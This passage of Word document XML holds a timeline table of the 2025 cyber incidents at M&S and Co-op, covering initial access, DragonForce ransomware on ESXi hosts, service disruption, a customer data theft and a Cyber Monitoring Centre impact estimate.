          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1501"/>
        <w:gridCol w:w="7859"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="6E19085A" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A4DD3DF" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date (2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06C5D214" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="39F00A9C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="516262A6" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Feb (est.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="466F612E" w14:textId="0D4837E7" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial access to M&amp;S is claimed to have occurred as early as February, providing the actor with a long stay time before disruption was obvious.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7C85461B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48D3E7E6" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17–22 Apr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04744B9C" w14:textId="4E6BBDF0" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Easter period brings disruption to M&amp;S as customers report contactless payment and Click &amp; Collect issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="00310811" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FDF80FB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22 Apr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C63EABC" w14:textId="2A4BCC0F" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>M&amp;S publicly says it is dealing with a “cyber incident” with a number of processes taken offline to protect customers, staff and systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7B0A7A77" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="740F1883" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>24 Apr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="022C5D78" w14:textId="5A826452" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">M&amp;S VMware </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> hosts targeted by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware which encrypts virtual machines powering e-commerce, payments and logistics. M&amp;S is openly tied to Scattered Spider.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="2705029C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C091813" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Late Apr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63ED7095" w14:textId="6871FD52" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Co-op notices intrusion activity and proactively shuts down elements of its IT estate to contain the attack, leading to stock and logistics disruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="46DC8499" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0641E587" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7 May</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="290F3121" w14:textId="6413E11E" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ransomware activity expanding across UK retail confirmed by reports Harrods also attacked around this time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7C2140FE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14D7B19C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13 May</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31C560D9" w14:textId="5D976224" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">M&amp;S will require comprehensive customer password change after confirming huge volume of data taken in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> assault.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="59CE6B1D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22C73A26" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Jun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7859" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="500E909B" w14:textId="6D4E5B8B" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The Cyber Monitoring Centre releases its first detailed evaluation of the combined M&amp;S/Co-op incident, rating it as Category 2 and estimating the effect between £270m and £440m.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="5B7E0333" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
